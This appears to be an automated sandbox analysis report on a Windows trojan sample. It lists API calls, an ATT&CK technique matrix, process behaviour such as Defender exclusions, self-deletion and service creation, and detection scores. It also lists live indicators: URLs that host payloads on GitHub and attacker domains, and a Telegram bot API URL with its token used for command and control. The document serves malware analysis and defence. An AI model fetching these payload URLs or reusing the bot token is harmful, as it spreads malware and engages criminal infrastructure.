    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF7450142F0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7450142F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8AF2860 GetUserNameA,GetLastError,_strdup,49_2_00007FF8B8AF2860
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EAB3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,5_2_00007FF8B7EAB3F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E67410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,5_2_00007FF8B7E67410
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB2130 calloc,calloc,calloc,bind,WSAGetLastError,5_2_00007FF8B7EB2130
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E7EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,5_2_00007FF8B7E7EFC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EB1EA6 calloc,calloc,calloc,bind,WSAGetLastError,5_2_00007FF8B7EB1EA6
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B810B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,49_2_00007FF8B810B3F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8111EA6 calloc,calloc,calloc,bind,WSAGetLastError,49_2_00007FF8B8111EA6
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80DEFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,49_2_00007FF8B80DEFC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B8112130 calloc,calloc,calloc,bind,WSAGetLastError,49_2_00007FF8B8112130
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B80C7410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,49_2_00007FF8B80C7410
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8111EA6 bind,WSAGetLastError,55_2_00007FF8B8111EA6
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80DEFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,55_2_00007FF8B80DEFC0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B8112130 bind,WSAGetLastError,55_2_00007FF8B8112130
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B810B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,55_2_00007FF8B810B3F0
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B80C7410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError,55_2_00007FF8B80C7410

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Disable or Modify Tools    		OS Credential Dumping11
    System Time Discovery    		1
    Exploitation of Remote Services    		12
    Archive Collected Data    		1
    Web Service    		Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts112
    Command and Scripting Interpreter    		111
    Windows Service    		111
    Windows Service    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory1
    Account Discovery    		Remote Desktop ProtocolData from Removable Media4
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts11
    Scheduled Task/Job    		11
    Scheduled Task/Job    		11
    Process Injection    		2
    Obfuscated Files or Information    		Security Account Manager1
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive21
    Encrypted Channel    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Service Execution    		1
    Registry Run Keys / Startup Folder    		11
    Scheduled Task/Job    		1
    Software Packing    		NTDS32
    System Information Discovery    		Distributed Component Object ModelInput Capture1
    Non-Standard Port    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud Accounts1
    PowerShell    		Network Logon Script1
    Registry Run Keys / Startup Folder    		1
    DLL Side-Loading    		LSA Secrets221
    Security Software Discovery    		SSHKeylogging4
    Non-Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
    File Deletion    		Cached Domain Credentials1
    Process Discovery    		VNCGUI Input Capture15
    Application Layer Protocol    		Data Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
    Masquerading    		DCSync121
    Virtualization/Sandbox Evasion    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    Modify Registry    		Proc Filesystem1
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
    Virtualization/Sandbox Evasion    		/etc/passwd and /etc/shadow1
    System Owner/User Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
    Process Injection    		Network Sniffing1
    System Network Configuration Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549107 Sample: SecuriteInfo.com.Trojan.Sig... Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 174 api.telegram.org 2->174 176 rootunvdwl.com 2->176 178 6 other IPs or domains 2->178 212 Malicious sample detected (through community Yara rule) 2->212 214 Multi AV Scanner detection for dropped file 2->214 216 Multi AV Scanner detection for submitted file 2->216 220 14 other signatures 2->220 14 SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe 3 2->14         started        18 svchost.exe 2->18         started        21 curlapp64.exe 3 2->21         started        23 console_zero.exe 2->23         started        signatures3 218 Uses the Telegram API (likely for C&C communication) 174->218 process4 dnsIp5 168 C:\Users\user\Desktop\zlib1.dll, PE32+ 14->168 dropped 170 C:\Users\user\Desktop\libcurl.dll, PE32+ 14->170 dropped 172 C:\Users\user\Desktop\curlapp64.exe, PE32+ 14->172 dropped 244 Self deletion via cmd or bat file 14->244 25 cmd.exe 1 14->25         started        28 cmd.exe 1 14->28         started        180 rootunvbot.com 188.116.21.204 NEPHAX-ASPL Poland 18->180 182 unvdwl.com 194.26.192.52 HEANETIE Netherlands 18->182 184 3 other IPs or domains 18->184 246 Adds a directory exclusion to Windows Defender 18->246 30 cmd.exe 18->30         started        32 cmd.exe 18->32         started        34 cmd.exe 18->34         started        36 cmd.exe 18->36         started        38 cmd.exe 21->38         started        42 2 other processes 21->42 40 cmd.exe 23->40         started        file6 signatures7 process8 signatures9 230 Suspicious powershell command line found 25->230 232 Uses schtasks.exe or at.exe to add and modify task schedules 25->232 234 Adds a directory exclusion to Windows Defender 25->234 44 2 other processes 25->44 49 2 other processes 28->49 51 2 other processes 30->51 53 2 other processes 32->53 55 2 other processes 34->55 57 2 other processes 36->57 59 2 other processes 38->59 61 2 other processes 40->61 63 2 other processes 42->63 process10 dnsIp11 188 github.com 140.82.121.4, 443, 49706, 49712 GITHUBUS United States 44->188 190 raw.githubusercontent.com 185.199.110.133, 443, 49715, 49717 FASTLYUS Netherlands 44->190 192 127.0.0.1 unknown unknown 44->192 162 C:\Windows \System32\printui.dll (copy), PE32+ 44->162 dropped 164 C:\Users\user\Desktop\prnttemp.dll, PE32+ 44->164 dropped 166 C:\Windows \System32\printui.exe, PE32+ 44->166 dropped 240 Multi AV Scanner detection for dropped file 44->240 65 cmd.exe 1 44->65         started        68 cmd.exe 1 44->68         started        70 cmd.exe 4 44->70         started        72 powershell.exe 51->72         started        74 conhost.exe 51->74         started        242 Loading BitLocker PowerShell Module 57->242 file12 signatures13 process14 signatures15 194 Drops executables to the windows directory (C:\Windows) and starts them 65->194 76 printui.exe 1 16 65->76         started        80 conhost.exe 65->80         started        82 conhost.exe 68->82         started        84 timeout.exe 1 68->84         started        86 conhost.exe 70->86         started        196 Loading BitLocker PowerShell Module 72->196 process16 file17 154 C:\Windows\System32\zlib1.dll, PE32+ 76->154 dropped 156 C:\Windows\System32\x882081.dat, PE32+ 76->156 dropped 158 C:\Windows\System32\usvcldr64.dat, PE32+ 76->158 dropped 160 11 other files (9 malicious) 76->160 dropped 236 Adds a directory exclusion to Windows Defender 76->236 238 Suspicious command line found 76->238 88 cmd.exe 76->88         started        91 cmd.exe 76->91         started        93 cmd.exe 1 76->93         started        95 6 other processes 76->95 signatures18 process19 signatures20 224 Drops executables to the windows directory (C:\Windows) and starts them 88->224 97 bav64.exe 88->97         started        100 conhost.exe 88->100         started        102 console_zero.exe 91->102         started        104 conhost.exe 91->104         started        226 Suspicious powershell command line found 93->226 106 powershell.exe 23 93->106         started        108 conhost.exe 93->108         started        228 Adds a directory exclusion to Windows Defender 95->228 110 powershell.exe 23 95->110         started        112 reg.exe 95->112         started        114 13 other processes 95->114 process21 dnsIp22 198 Adds a directory exclusion to Windows Defender 97->198 117 cmd.exe 97->117         started        119 cmd.exe 97->119         started        121 cmd.exe 97->121         started        133 15 other processes 97->133 200 Multi AV Scanner detection for dropped file 102->200 202 Found stalling execution ending in API Sleep call 102->202 204 Found API chain indicative of debugger detection 102->204 123 cmd.exe 102->123         started        206 Found suspicious powershell code related to unpacking or dynamic code loading 106->206 208 Loading BitLocker PowerShell Module 106->208 210 Creates a Windows Service pointing to an executable in C:\Windows 112->210 186 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 114->186 125 conhost.exe 114->125         started        127 conhost.exe 114->127         started        129 conhost.exe 114->129         started        131 timeout.exe 1 114->131         started        signatures23 process24 process25 135 powershell.exe 117->135         started        138 conhost.exe 117->138         started        140 powershell.exe 119->140         started        142 conhost.exe 119->142         started        144 powershell.exe 121->144         started        146 conhost.exe 121->146         started        150 2 other processes 123->150 148 powershell.exe 133->148         started        152 27 other processes 133->152 signatures26 222 Loading BitLocker PowerShell Module 135->222

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe39%ReversingLabsWin64.Trojan.Amadey
    SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\Desktop\curlapp64.exe34%ReversingLabsWin64.Trojan.Cerbu
    C:\Users\user\Desktop\libcurl.dll0%ReversingLabs
    C:\Users\user\Desktop\zlib1.dll0%ReversingLabs
    C:\Windows \System32\printui.exe0%ReversingLabs
    C:\Windows\System32\console_zero.exe75%ReversingLabsWin64.Infostealer.Tinba
    C:\Windows\System32\libcrypto-3-x64.dll0%ReversingLabs
    C:\Windows\System32\libcurl.dll0%ReversingLabs
    C:\Windows\System32\libiconv-2.dll0%ReversingLabs
    C:\Windows\System32\libintl-9.dll0%ReversingLabs
    C:\Windows\System32\libpq.dll0%ReversingLabs
    C:\Windows\System32\libssl-3-x64.dll0%ReversingLabs
    C:\Windows\System32\libwinpthread-1.dll0%ReversingLabs
    C:\Windows\System32\ucrtbased.dll0%ReversingLabs
    C:\Windows\System32\vcruntime140d.dll0%ReversingLabs
    C:\Windows\System32\x882081.dat54%ReversingLabsWin64.Trojan.Generic
    C:\Windows\System32\zlib1.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://rootunvdwl.com/un2/urestorehard.dat0%Avira URL Cloudsafe
    http://unvdwl.com/un2/botprnt.datsInfo0%Avira URL Cloudsafe
    http://unvdwl.com/un2/botprnt.dat0%Avira URL Cloudsafe
    https://raw.githubusercontent.c0%Avira URL Cloudsafe
    http://www.zlib.net/0%Avira URL Cloudsafe
    http://unvdwl.com/un2/botprnt.datZ0%Avira URL Cloudsafe
    http://unvdwl.com/un2/urestorehard.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    unvdwl.com
    		194.26.192.52
    		truefalse
      		unknown
      github.com
      		140.82.121.4
      		truefalse
        		high
        ipinfo.io
        		34.117.59.81
        		truefalse
          		high
          raw.githubusercontent.com
          		185.199.110.133
          		truefalse
            		high
            rootunvbot.com
            		188.116.21.204
            		truefalse
              		unknown
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high
                dns.google
                		8.8.8.8
                		truefalse
                  		high
                  rootunvdwl.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://dns.google/resolve?name=rootunvdwl.comfalse
                      		high
                      https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datfalse
                        		high
                        https://ipinfo.io/jsonfalse
                          		high
                          https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessagefalse
                            		high
                            https://dns.google/resolve?name=unvdwl.comfalse
                              		high
                              https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.datsvchost.exe, 00000031.00000002.3261330256.000001B531CF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datP#curlapp64.exe, 00000009.00000002.2276560928.00000260AC304000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datecurlapp64.exe, 00000009.00000002.2276560928.00000260AC324000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://rootunvdwl.com/un2/urestorehard.datsvchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.telegram.orgpowershell.exe, 00000046.00000002.2568697905.0000026780C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datccurlapp64.exe, 00000005.00000002.2165249434.00000231626B6000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprcurlapp64.exe, 00000017.00000002.2359306959.00000183078B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datsvchost.exe, 00000031.00000002.3261227010.000001B531C84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpu.datsvchost.exe, 00000031.00000002.3261137440.000001B531C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000003.3145802717.000001B531CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3261311476.000001B531CEE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.datGMTsvchost.exe, 00000031.00000002.3261405626.000001B531F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datceptsvchost.exe, 00000031.00000002.3261227010.000001B531C84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://raw.githubusercontent.ccurlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datv9&Tcurlapp64.exe, 00000009.00000002.2276560928.00000260AC307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat.1curlapp64.exe, 00000005.00000002.2165249434.00000231626A3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ipinfo.io/jsonhardware_manager::download_json_error:svchost.exe, 00000031.00000002.3262019634.00007FF8A70CE000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                            		high
                                                            https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dattprnt.datcurlapp64.exe, 00000009.00000002.2276560928.00000260AC307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.openssl.org/svchost.exefalse
                                                                		high
                                                                https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dath#curlapp64.exe, 00000009.00000002.2276560928.00000260AC304000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datFcurlapp64.exe, 00000005.00000002.2165249434.00000231626B6000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://unvdwl.com/un2/botprnt.datsInfocurlapp64.exe, 00000009.00000002.2276560928.00000260AC2F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datfsvchost.exe, 00000031.00000002.3261405626.000001B531F02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprP1/curlapp64.exe, 00000009.00000002.2276560928.00000260AC324000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://curl.se/docs/hsts.htmlSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drfalse
                                                                          		high
                                                                          https://api.telegram.org/bot7607027553:aahrudqnba23c1me3ecfjgijnq0h1nbcp5y/sendmessagepowershell.exe, 00000046.00000002.2678627235.00000267FDA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://curl.se/docs/alt-svc.html#curlapp64.exe, svchost.exe, console_zero.exefalse
                                                                              		high
                                                                              https://curl.se/curlapp64.exe, svchost.exe, console_zero.exefalse
                                                                                		high
                                                                                https://curl.se/docs/hsts.html#curlapp64.exe, svchost.exe, console_zero.exefalse
                                                                                  		high
                                                                                  https://contoso.com/powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.2228764088.0000020CA7361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.0000026790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.00000267901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://oneget.orgXpowershell.exe, 00000046.00000002.2568697905.0000026781687000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://crl.micft.cMicRosofpowershell.exe, 00000014.00000002.2235385466.0000020CAF666000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/uamd.datsvchost.exe, 00000031.00000002.3261112919.000001B531C13000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datscurlapp64.exe, 00000005.00000002.2165249434.00000231626A3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2164909140.00000231626A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.2205494711.0000020C972F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.0000026780001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/unv.datsvchost.exe, 00000031.00000002.3261112919.000001B531C13000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.gnu.org/licenses/svchost.exe, 00000031.00000002.3260796016.00000000682A4000.00000008.00000001.01000000.00000013.sdmp, libintl-9.dll.14.drfalse
                                                                                                    		high
                                                                                                    https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat:curlapp64.exe, 00000017.00000002.2359306959.0000018307889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.2228764088.0000020CA7361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.0000026790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2654496859.00000267901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2568697905.00000267818D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000046.00000002.2568697905.0000026781687000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000046.00000002.2568697905.0000026780232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://curl.se/docs/http-cookies.htmlSecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe, libcurl.dll.14.drfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000014.00000002.2205494711.0000020C97518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000046.00000002.2568697905.0000026780232000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datMcurlapp64.exe, 00000005.00000002.2165249434.000002316268C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://go.micropowershell.exe, 00000046.00000002.2568697905.0000026780C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crl.micpowershell.exe, 00000014.00000002.2235385466.0000020CAF666000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
